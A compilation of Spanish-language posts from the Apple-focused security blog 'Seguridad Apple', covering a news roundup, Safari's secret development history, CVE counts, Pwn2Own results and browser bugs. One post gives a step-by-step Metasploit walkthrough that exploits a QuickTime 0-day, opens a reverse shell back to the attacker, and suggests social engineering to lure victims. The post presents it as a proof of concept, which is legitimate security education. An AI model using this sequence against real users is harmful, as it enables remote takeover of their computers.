Fue noticia en seguridad Apple: del 23 de octubre al 5 de noviembre

Comienza noviembre y en Seguridad Apple seguimos trabajando para traeros las mejores noticias en el ámbito de la seguridad informática relacionadas con Apple. Este es nuestro nuevo Fue Noticia, sección en la que os traemos un breve resumen de las noticias más relevantes de las últimas dos semanas. Todo ello aderezado con el mejor contenido de otros sitios de referencia.

Comenzamos el lunes 23 contándoos que el senador Al Franken escribió una carta a Tim Cook mostrándole la preocupación por la seguridad y la privacidad respecto a la llegada del nuevo Face ID.

El martes día 24 os avisamos de la llegada del Big Data Innovation Day, un evento en el que os mostramos las novedades del último año en el creciente mundo del big data.

El miércoles 25 os alertamos de la aparición de un nuevo troyano para Mac OSX que se propaga a través de la descarga del reproductor multimedia Elmedia player debido a que su base de datos se vio comprometida.

El jueves 26 os avisamos de la llegada de una de nuestras ElevenPaths Talks, en la que se abordará sobre la inevitable evolución de la seguridad gestionada, y os invitamos a seguir de cerca esta tercera temporada.

El viernes 27 os contamos como la EFF ha lanzado una dura crítica contra Apple debido al nuevo control center implementado en iOS 11 y las posibles brechas de seguridad que supone su uso.

El sábado 28 echamos la vista atrás para indagar un poco en la historia de Apple para hablaros del desconocido Apple II, el primer ordenador relacionado con el mundo de la música.

El domingo cerramos la semana contándoos como una vulnerabilidad de Java en ordenadores Mac permitió que una base de datos de Microsoft que guardaba información sensible fuese vulnerada.

El lunes 30 os contamos como unos videos publicados en You Tube en los que se mostraba el nuevo iPhone X han provocado el despido de uno de los ingenieros de Apple.

El martes 31 os avisamos de la llegada de una de nuestras CodeTalks4Devs, en la cual se hablará sobre Dirtytooth y se contará como realizar su instalación en una Raspberry usando un paquete DEB.

El miércoles 1 os presentamos iOS 11.1, una actualización con la que se pretende acabar con los problemas de batería que tenían algunos terminales y que incorpora algunas novedades como un nuevo pack de emojis.

El jueves 2 os hablamos sobre como un fallo descubierto en iOS que permite a algunas aplicaciones acceder a la cámara de tu dispositivo sin solicitar ninguna clase de permiso.

El viernes 3 os contamos como es posible que algunas aplicaciones de iOS puedan acceder a tu ubicación a través de la galería y os explicamos como se puede evitar.

Finalmente, el sábado volvimos a hablaros de un poco de historia del mundo Apple. En esta ocasión hablamos de la historia en la que Apple paso a su navegador Safari por Internet Explorer para mantenerlo en secreto. Gran historia.

Os esperamos de nuevo en dos semanas para mostraros nuestro resumen de todo lo que ocurre en el mundo de la manzana mordida. Sin duda, un mundo apasionante y que semanalmente nos proporciona un gran número de noticias de interés.

Apple hizo pasar por Internet Explorer su navegador Safari para mantenerlo en secreto

En la famosa MacWorld Expo celebrada en Boston en 1997, un renacido Steve Jobs (que acaba de volver triunfante a su querida Apple) anunciaba una serie de acuerdos con Microsoft, centrados sobre todo en el uso de patentes y la implementación de Office para Mac. Este vídeo ya lo conocéis por su parte mítica donde aparece Bill Gates ante el estupor y rabia de todos los asistentes. Lo que no es tan conocido es que allí también se presentó al público la incorporación de Internet Explorer al mundo Apple.

Antes de 1997, los ordenadores Apple tenían como navegador oficial Netscape y Cyberdog. Gracias al acuerdo que hemos comentado antes y que se presentó en la MacWorld Expo de Boston, a partir de la versión Mac OS 8.1. en adelante y durante cinco años, Internet Explorer sería el navegador oficial de Apple. Finalmente, en 2003, en la MacWorld Expo de San Francisco, se presentó la primera versión de Safari, el navegador propio de Apple. Vamos a ver un poco de su interesante historia.

El 25 de junio de 2001, un empleado de Apple llamado Don Melton fue asignado como encargado de formar un equipo para trabajar en un nuevo proyecto alto secreto de Apple: un navegador web. El desarrollo era totalmente alto secreto, hasta el punto que sólo los que formaban parte del proyecto sabrían exactamente el objetivo del mismo. Pero cuando Apple contrató a Dave Hyatt (co-creador de Firefox) el cual era una eminencia en el mundo de los navegadores web por crear el navegador Chimera o  también denominado Camino (el cual estaba basado a su vez en el motor de Mozilla Gecko), comenzaron los rumores y especulaciones sobre el nuevo proyecto de Apple. Las dos especulaciones más comentadas eran que Chimera sería portado oficialmente a Mac (aunque ya funcionaba bajo esa plataforma).

Figura 1. Navegador Chimera / Camino. Fuente.

Internamente en Apple, el proyecto del nuevo navegador se conocía con el nombre de "Alexander" ó "iBrowser". Finalmente, después de muchas reuniones el nombre final fue Safari. Durante su desarrollo, una de las principales preocupaciones de Don Melton era que se filtrara el proyecto y echara al traste el factor sorpresa, incluso obligaban bajo juramento a no revelar nada del proyecto. Era importante que Apple se independizara con su propio navegador lo antes posible. Para conseguir que todo el desarrollo se mantuviera en secreto, una de las claves era no revelar ninguna pista de los servidores web que estaban utilizando, como por ejemplo la cadena "User-Agent" o las direcciones IP. Era importante falsear esta información para que nadie pudiera seguir alguna pista cuando se analizaran los logs de acceso a sus servidor web.

Como antes hemos mencionado, Apple tenía un acuerdo desde 1997 para utilizar Internet Explorer, entonces ¿qué puede ser mejor que hacerse pasar por este navegador para despistar a los administradores de los sitios web que estaban visitando?. En cambio, había ciertas pruebas que tenían que usar la cadena "User-Agent" de Safari en vez de las de Internet Explorer. Para este tipo de pruebas, el plan era utilizar dicha cadena sólo cuando se encontraran fuera del campus o mejor dicho, cuando las pruebas se realizaran en ordenadores que no tuvieran la dirección IP de Apple (cualquier IP de clase A que empiece por "17.X.X.X" pertenece a Apple). De esta forma no se podría relacionar el "User-Agent" de Safari con Apple.

Safari no se creó desde cero, se basó en motores de renderizado Open Source como KHTML y KJS, el motor Konqueror, base del navegador web de KDE. En la MacWorld del 7 de Enero de 2003, por fin se presenta Safari a un público entregado (aunque se quedaron mudos cuando Steve Jobs explica que está basado en KHTML). La presentación de Safari comienza en el minuto 54:10 del siguiente vídeo:

Un gran detalle que tuvo Don Melton fue enviar un correo durante la MacWorld de presentación de Safari a la lista de desarrollo de KDE, agradeciendo el gran trabajo que habían realizado con KHTML y KJS. También anunció que publicarían todas las mejoras y cambios que habían realizado al motor, las cuales fueron incorporadas de inmediato a KDE.

Apple tiene más CVE que cualquier producto Microsoft en 2015

El año 2015 ya es historia y nos ha dejado grandes cosas. Hoy traemos una estadística que puede sorprender a muchos escépticos. Tras realizar un recuento de CVE, vulnerabilidades en el año 2015, se ha publicado que Apple ha sido el sistema operativo con más Advisory del año. Esto lleva a que muchos se adentren en un titular fácil: "OS X es el sistema operativo más vulnerable". Este tipo de titulares deben ser manejados con mucho cuidado, ya que tener de más CVE no implica que seas el más inseguro. 

Según los detalles que se pueden sacar de los CVE, OS X, en todas sus versiones, tiene 384 avisos en 2015. El sistema operativo iOS tenía 375. Flash tiene 314. Windows se encuentra atrás en el ranking, y el peor producto de la gente de Redmond es Internet Explorer con 231 CVE. ¿Qué significa todo esto? Realmente poco. La estadística llevada a cabo no hace distinción entre la gravedad o criticidad de las vulnerabilidades de la lista. En otras palabras, no es lo mismo una vulnerabilidad que permite ejecutar código remoto en una máquina que otra que te permite obtener un leak. 

Figura 1: Exposición de los hechos en Twitter por SecuriTay

 

Existen muchos errores de seguridad mutiplataforma. Esto quiere decir que si una vulnerabilidad afecta a una plataforma, posiblemente también a la otra. SecuriTay comentaba mediante Twitter que la manera de contar los CVE no ayuda a mejorar la seguridad, pero la gente ama los números. Esto es algo que parece bastante real, ya que esta estadística no refleja la verdadera seguridad que aportan los sistemas o aplicaciones. Habría que evaluar los riesgos que suponían cada una de las vulnerabilidades encontradas en cada sistema y aplicación. Por ejemplo, mediante un Score como puede ser CVSS.

Adobe libera un Security Update de urgencia para OS X

Adobe ha liberado una actualización de seguridad para Adobe Flash Player para sistemas operativos Windows, OS X y Linux. Esta actualización de seguridad parchea la vulnerabilidad CVE-2015-3113, la cual podría permitir a un atacante potencial tomar el control de los sistemas afectados y ejecutar código arbitrario. Adobe está siendo explotado de forma activa, y los atacantes están buscando fallos a través de su software para llegar a los sistemas. La recomendación de Adobe es actualizar sus productos a la última versión cuanto antes, así que no te demores.

A continuación se muestra la enumeración de las recomendaciones que ha publicado el propio Adobe:

• Usuarios con Adobe Flash Player Desktop Runtime para Windows y OS X deberían actualizar a la versión 18.0.0.194.
• Usuarios de Adobe Flash Player Extended Support Release deberian actualizar a la versión 13.0.0.296.
• Usuarios de Adobe Flash Player for Linux deberían actualizar a la versión 11.2.202.468.
• Mientras que las instalaciones de Adobe Flash Player instaladas con Google Chrome o Intenet Explorer 8.X automáticamente se actualizarán a la versión 18.0.0.194.

Las versiones de software afectadas según indica Adobe en su boletín de seguridad son las siguientes:

• Adobe Flash Player 18.0.0.161 y versiones anteriores para OS X.
• Adobe Flash Player Extended Support Release 13.0.0.292 y versiones anteriores.
• Adobe Flash Player 11.2.202.466 y versiones anteriores. 

Se recomeinda que se actualicen las versiones de Adobe Flash Player lo antes posible, y si no se utiliza en la navegación deshabilitar los módulos del navegador con el fin de no caer en sitios maliciosos que nos envíen el exploit a través del navegador.

Google Chrome es navegador que tuvo más bugs en 2014

La empresa Secunia ha publicado su informe anual de analisis vulnerabilidades con resultados relativos al año anterior realmente sorprendentes. Hace poco vimos que, de forma inesperada para muchos, el sistema operativo menos vulnerado del año pasado fue Microsoft Windows, y hoy vemos que uno de los navegadores con mayor popularidad es, además, uno de los más vulnerables. Secunia se ha basado en un KPI interesante y es el número de 0days encontrados en 2014 para este navegador.  Este informe se basa en todos los datos recogidos por la herramienta PSI de la compañía que reside en millones de equipos de clientes y la base de datos de bugs que atesora.

El primer puesto en vulnerabilidades fue para Google Chrome, mientras que Oracle Solaris, Gentoo Linux y Microsoft Internet Explorer copaban el resto de puestos. Estos datos tienen dos lecturas importantes, desde el punto de vista de Secunia la empresa informa del número de bugs anuales, pero los ingenieros de Google indican que muchas de ellas son vulnerabilidades parcheadas, por lo que no eran explotables. Por este hecho, también se ha comentado que un factor importante era la cuenta de 0days en los productos, ya que esto sí es un indicador válido. 

Google Chrome encabeza la lista de navegadores con 504 vulnerabilidades reportadas seguido por Internet Explorer con 289, mientras que Firefox tiene 171. Entre todos los navegadores se registraron 1035 vulnerabilidades, mientras que en el año de 2013 se registraron 728. Esto quiere decir que algo está cambiando, quizá los navegadores se encuentran cada vez más en el foco de los investigadores. Además, en el informe se refleja que ha existido un aumento de 14 a 25 en lo que a 0days se refiere.

Figura 1: Listado de productos y sus vulnerabilidades

En el informe, un dato muy interesante es la revelación de que Mozilla registró el mayor número de usuarios con el navegador no parcheado, seguido por Chrome e Internet Explorer. Este hecho podría deberse a que Mozilla es utilizado en muchas ocasiones como navegador secundario, y a menudo no se actualiza con la misma frecuencia.

En líneas generales, el informe indica que se registraron 15435 vulnerabilidades totales en relación con 3870 aplicaciones de 500 vendors. Eso es un aumento del 18 % de un año a otro, mientras que es un 55 % más desde el año 2009. De todas estas vulnerabilidades, 1698, es decir un 11% se consideran altamente críticas, y un 43, un 0,3%, son extremadamente críticas. El 83% de los vendors parchearon su producto antes de que las vulnerabilidades se dieran a conocer públicamente, mientras que en 2009 solo la mitad lo hicieron. Por último, y según indica el informe, los ataques remotos son más comunes, un 60%, que los vectores locales, un 33,4%.

Figura 2: Gráfica de vulnerabilidades anuales

Este tipo de informes hacen ver qué hay diferentes formas de evaluar el impacto de las vulnerabilidades, y aunque un software tenga más vulnerabilidades que otros, el impacto dependerá de la criticidad de la vulnerabilidad, y su ámbito de descubrimiento, es decir si fueron parcheadas antes de ser conocidas públicamente. Otro factor interesante es conocer el ciclo de vida de la vulnerabilidad, es decir, el tiempo entre que se publica el parche y la vulnerabilidad desaparece de los sistemas de los usuarios y, como no, la calidad de los parches. De nada vale parchear rápido si se introducen nuevos bugs de funcionalidad y/o seguridad.

Apple Safari también cayó en el Pwn2Own de ayer

Está teniendo lugar el famoso concurso Pwn2Own donde los exploiters compiten por encontrar 0days en los productos que se les presentan en competición obteniendo premios económicos que ya superan el 1.000.000 de dólares. En el primer día de la competición cayeron muchos de los productos y a las 10 de la mañana del segundo día, tal y como cuentan en Naked Security, Apple Safari fue el siguiente en caer en la competición oficial.

Esperemos que en la nueva release de OSX 10.9.3 que convenientemente Apple no ha sacado antes del Pwn2Own para poder cerrar eventualmente nuevos bugs, corrija este fallo descubierto en sus sistemas y cualquiera que afecte a Oracle Java 6, que no olvidemos que aún distribuye Apple ese software para equipos con versiones OS X anteriores.

Figura 1: Resultados del día 2 en la competición oficial

La nota curiosa la pusieron los equipos de HP y Google que compitieron fuera de concurso contar Apple Safari e Internet Explorer, encontrando ambos la forma de lanzar la calculadora del sistema con un 0day. Lo curioso es que el equipo de Google, que atacaba a Apple Safari, la sacó en modo científico para demostrar que ellos eran los ganadores consiguiendo no solo ejecución remota sino elevación de privilegios.

Figura 2: La calculadora científica en el exploit de Apple Safari

Aunque muchos dijeron que el exploit 0day que encontraron para Apple Safari en las versiones de OS X no funcionaría porque se requeriría interacción con el usuario e introducción de contraseña para conseguir la elevación de privilegios, el equipo de Google demostró que no y dejó claro que su exploit también conseguía ejecución de código y elevación de privilegios en Apple Safari sobre OS X sin interacción con el usuario.

Figura 3: Resultados por tecnología y premios pagados a los exploits

Al final el que más veces acabó tumbado con 0days fue Mozilla Firefox que sufrió 4 pwned! pero todos se llevaron lo suyo, por lo que se esperan actualizaciones pronto de Oracle Java, Mozilla Firefox, Google Chrome, Apple Safari, Adobe Flash y Acrobat Reader, ya que de todos se ha conseguido encontrar exploits de ejecución remota de código.

CVE 2012: Windows, OSX, SmartPhones y Navegadores

En el blog de Alma Oscura han hecho una curiosa comparativa con los CVE descubiertos durante el año 2012, es decir, los CVE-2012-XXXX en los sistemas operativos OS X 10.7 Lion y 10.8 Mountain Lion, Windows 7 y Windows 8, Android, iOS, Windows Phone y los distintos navegadores de internet más utilizados. Como siempre, estos datos no se pueden tomar como una medida absoluta de seguridad, pero sí que refleja eso, quién ha tenido más CVE que quién. Las tablas de la comparativa son:

Figura 1: Comparativa de CVE-2012-XXX entre Windows7/8 y OSX Lion/Moutain Lion

Figura 2: Comparativa de CVE-2012-XXX entre navegadores

Figura 3: Comparativa de CVE-2012-XXX entre sistemas operativos de smartphones

Según el autor de la comparativa, todas las cuentas se han hecho tomando las bases de datos de Secunia y el NIST, y no reflejan otros factores como la criticidad de las vulnerabilidades, el tiempo de exposición, o la facilidad de la solución, pero valen como una media de más para conocer más sobre la seguridad de las plataformas.

Google Chrome "el más buggy en 2012" arregla 11 CVEs

Desde Google se ha lanzado esta semana la actualización de Google Chrome 26 para sistemas operativos Microsoft Windows, OS X y Linux, corrigiendo 10 vulnerabilidades, de las cuales 2 tienen nivel highly critical, 4 son importantes y 5 son de nivel bajo. De todos ellos, uno de ellos ha sido obtenido por el programa de recompensa de bugs Pwnium con 1.000 USD, tal y como se puede ver en el informe de la versión publicado por Google.

Estas actualizaciones de Google Chrome se despliegan automáticamente en todos los usuarios, y puedes comprobar si ya la tienes instalada en tu equipo yendo al menú desplegable y seleccionando la opción de Información. Allí te llevará a esta pestaña de configuración donde podrás comprobar si tienes la versión 26. Si no es así, dale a buscar actualizaciones.

Figura 1: Google Chrome 26 en OS X Mountain Lion 10.8.3

Hay que recordar que Google Chrome durante el año 2012 fue uno de los programas con más fallos de seguridad descubiertos, tal y como reporta en su informe Secunia, en el que se puede ver que Google Chrome casi alcanzó los 300 bugs de seguridad.

Figura 2: Datos de fallos de seguridad en software en el informe Secunia

Por ponerlo en contexto, Mozilla Firefox tuvo 257 y Microsoft Internet Explorer 40, lo que dejó a Google Chrome como el navegador de Internet con más bugs descubiertos en 2012.

Pwn2Own: Apple Safari aguantó, pero también valía menos

Todos los años cuando llega el concurso Pwn2Own de exploiters en busca de 0days para las principales plataformas todo se revoluciona. Este año no iba a ser distinto, sino incluso peor con la cantidad de dinero que se estaba poniendo en juego por la búsqueda de vulnerabilidades. En la web de HP del concurso de ZDI puede verse la tabla de premios, en la que se puede apreciar que Apple Safari sobre OS X Mountain Lion se pagaba un poco más que la mitad de lo que se paga por un ataque a un Windows 7 con Google Chrome.

Por supuesto, Google poco antes del concurso parcheo los últimos bugs que tenía en la guantera, algo habitual en la casa del buscador antes de este concurso, pero aún así, el día uno cayeron todos lo grandes navegadores de Internet, a excepción de Apple Safari.

Figura 1: Premios entregados por cada objetivo en el concurso Pwn2Own 2013

Eso sí por desgracia Java, soportado en Apple Safari en las últimas versiones del framework también cayó, y el segundo día termino por caer otro software ampliamente utilizado por los cibercriminales, Adobe Flash Player y Adobe Reader, por lo que hay que preocuparse de nuevo por la seguridad de toda esta plataforma.

Figura 2: Objetivos conquistados y orden de conquista

Google Chrome ya ha actualizado su navegador, Mozilla Firefox lo ha hecho, pero solo en plataforma Windows, y mientras nos quedamos a le espera en la plataforma Mac OS X a que el navegador de la Fundación Mozilla salga también aquí, y a que Oracle y Adobe nos vuelvan a parchear sus plugins para la web.

Fallo en Apple Safari, Opera, Google Chrome y MS Internet Explorer en límites almacenamiento de HTML 5 Local Store

El desarrollador Feross Aboukhadijeh ha encontrado un fallo de seguridad en los navegadores Apple Safari, Opera Web Browser, Google Chrome y Microsoft Internet Explorer en la forma en la que implementan los límites del almacenamiento local "LocalStore" en HTML5. Cada uno de estos navegadores tiene establecido un límite máximo para cada origen que intente almacenar datos en local, estos son:

- Google Chrome: 2.5 MB
- Mozilla Firefox y Opera: 5 MB
- MS Internet Explorer: 10 MB

Sin embargo, la definición del estándar dice que deben establecerse límites máximos para la suma de sitios afiliados, es decir, para cuando sea s1.origen.com, s2.orgien.com, s3.origen.com ... pero ni Google Chrome, ni Opera, ni Apple Safari, ni MS Internet Explorer los tienen, así que con la prueba de concepto creada por el investigador llamada Fill Disk, demuestra cómo saltarse esos límites.

Figura 1: FillDisk.com entrando on un Mozilla Firefox (safe!)

Solo estás a salvo entrando con Mozilla Firefox, si entras con Apple Safari, Opera o Google Chrome con tu Mac OS X, tu disco duro empezará a perder espacio, por lo que ten cuidado. En este vídeo tienes una demo de cómo funciona este sistema. Puedes descargar el código de la Prueba de Concepto.

Figura 2: Vídeo demostrativo del bug de LocalStore en HTML5

Esperemos que pronto se solucionen estos fallos, que al precio que va el GB de SSD en los MacBook Pro estamos como para perderlo con datos que lo desaprovechen.

El caso del espionaje de Google a usuarios continúa...

La historia del espionaje por parte de Google hacia los usuarios de Apple Safari que destapó el Wall Street Journal ha traído cola. En primer lugar, Microsoft confirmó que este seguimiento no se utilizaba sólo con usuarios de Apple Safari, sino que aquellos que navegaban con Internet Explorer también eran espiados por parte de las anuncios mostrados en las páginas visitadas.

En segundo lugar, hay que hablar de las consecuencias legales que esto va a traer para Google, ya que parece que este caso va convertirse en algo similar a lo que ya sucedió cuando se supo que el Google Street Car estaba grabando información de las redes WiFi que iba encontrando. De momento, tal y como informan desde Apple Insider, Google ha sido demandada por varios usuarios y organizaciones por saltarse las opciones de privacidad establecidas en el navegador, que ya se verá en qué terminan.

Figura 1: Do Not Track Plus en Apple Safari

Por último, ya han salido algunas herramientas para extremar las opciones de privacidad en los navegadores para evitar este seguimiento. Hay que recordar que soluciones como NoScript o similares - o plugins para quitar la publicidad de la Google mientras se navega - existen hace mucho tiempo. Para los usuarios de Apple Safari, desde MacWorld han recomendado el uso de Do Not Tack Plus, un plugin que extrema las opciones de privacidad e informa cuando se están enviando datos a páginas externas. En el siguiente vídeo tenéis una demostración de cómo funciona.

En cualquier caso, desde Seguridad Apple os queremos recordar la importancia de extremar las medidas de privacidad y aplicar hábitos "saludables", porque todo esto que estamos viendo con escándalos de privacidad puede ser nada más que la punta del iceberg.

Bug en Apple Safari crashea SSOO Windows 7 de 64 bits

Se ha publicado en Twitter una vulnerabilida en Apple Safara para Windows 7 de 64 bits que hace que el sistema crashée y genere una BSOD (Blue Screen Of Death) con solo abrir una página web con una etiqueta iFrame con un valor concreto. El exploit de D.O.S. fue publicado por el investigador de seguridad w3bDEVIL en su cuenta twitter y el valor, y la POC. es tan sencillo como peligroso.

Figura 1: Publicación del código que crashea Windows 7 de 64bits a través de Apple Safari

Tras publicarse este fallo, y comprobarse de forma consistente, Secunia ha lanzado un advisory de seguirdad para alertar de este fallo, que puede verse en funcionamiento en el siguiente vídeo que se ha publicado.

El fallo no funciona en sistemas Windows 7 de 32 bits, y tampoco en sistemas Mac OS X, por lo que solo debes tener cuidado si eres un usuario de Apple Safari en Windows 7 de 64 bits. Este fallo en sistemas Windows de Apple Safari es un ejemplo de que la arquitectura de seguridad del navegador de Apple en sistemas Microsoft debe mejorar, ya que no hace uso de las mejoras de seguridad que ofrece el sistema.

Apple Safari y los Niveles de Integridad en Windows 7

Así, es común ver las quejas de investigadores de seguridad sobre que no hace una división de procesos interna para poder hacer un uso correcto de MIC (Mandotory Integrity Control), un sistema que permite correr el código de las páginas web con niveles menos privilegiados de seguridad y aisla cada pestaña del resto. Algo que sí que hacen Google Chrome o Internet Explorer en Windows 7.

Figura 2: Niveles de Integridad de navegadores en Windows 7 64 bits

Como se puede ver en la imagen superior, mientras que las pestañas de Google Chrome corren con un Nivel de Integridad Bajo, las de Apple Safari corren todas juntas en un único proceso y con Nivel de Integridad Medio, lo que da más permisos al código en el sistema operativo donde se ejecuta.

Explotando con Metasploit el 0-day en QuickTime publicado por Reversemode

Como ya indicamos en entradas anteriores, Ruben Santamarta investigador de seguridad, ha sacado a la luz un 0day que afecta a las últimas versiones de QuickTime en todas las versiones de Windows.

La noticia ha cogido tanta expectación, que los desarrolladores de metasploit han tardado apenas un día en liberar un módulo para su framework.

En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).

Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:

·         use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
·         set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
·         set SRVPORT 80 (Puerto local del servicio)
·         set URIPATH juegos (Uri del servicio)
·         set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
·         set LHOST 192.168.0.162 (IP donde se conectará la víctima)
·         set LPORT 5050 (Puerto local de escucha)
·         exploit (Ejecutamos el exploit)

Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.

Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.

Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.

Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

·         sessions -i 2

De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.

Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.

Si quieres aprender más sobre cómo funciona Metasploit, puedes leer el libro de Pablo González Metasploit para Pentesters

Peligroso 0-day exploit para Apple Quicktime Player en Windows

Ayer, Rubén Santarmarta, investigador español de seguridad, sacó a la luz pública una vulnerabilidad que permite ejecutar código arbitrario en todas las versiones de Windows a partir de una vulnerabilidad en Apple Quicktime Player que lleva 9 años escondida y que ha dado la vuelta al mundo.

La vulnerabilidad se debe a un parámetro olvidado, llamado "_Marshaled_pUnk", en el visor de QuickTime que se utilizaba para cargar elementos dentro de la ventana. Esta funcionalidad se eliminó, pero como dice el propio Rubén Santamarta en la publicación de su exploit, parece que alguien se olvido de limpiarlo.

Para explotar la vulnerabilidad, Rubén utilizó una técnica llamada ROP (Return Oriented Programing) por la que, mediante la carga de la librería WindowsLiveLogin.dll, presente en todos los equipos en los que está instalado Windows Live Messenger, pudo reorganizar el código para generar un exploit funcional en Internet Explorer 8 y Windows 7.

Como mitigar el impacto

Actualmente no hay parche oficial, y es posible que el número de exploits que utilicen este vector de ataque se dispare, por lo que se recomienda controlar el uso del visor de QuickTime en Internet. Para ello, se puede utilizar la funcionalidad que ofrece Internet Explorer para elegir qué usuarios y qué dominios pueden cargar un determinado componente en Internet Explorer 8.

En el blog Windows Técnico hay un interesante artículo que explica como configurar los componentes de Internet Explorer 8 de esta forma.

Además, desde que Internet Explorer 8 está integrado completamente en las políticas de Active Directory, se recomienda gestionar la carga de componentes en el navegador de forma centralizada mediante una política corporativa.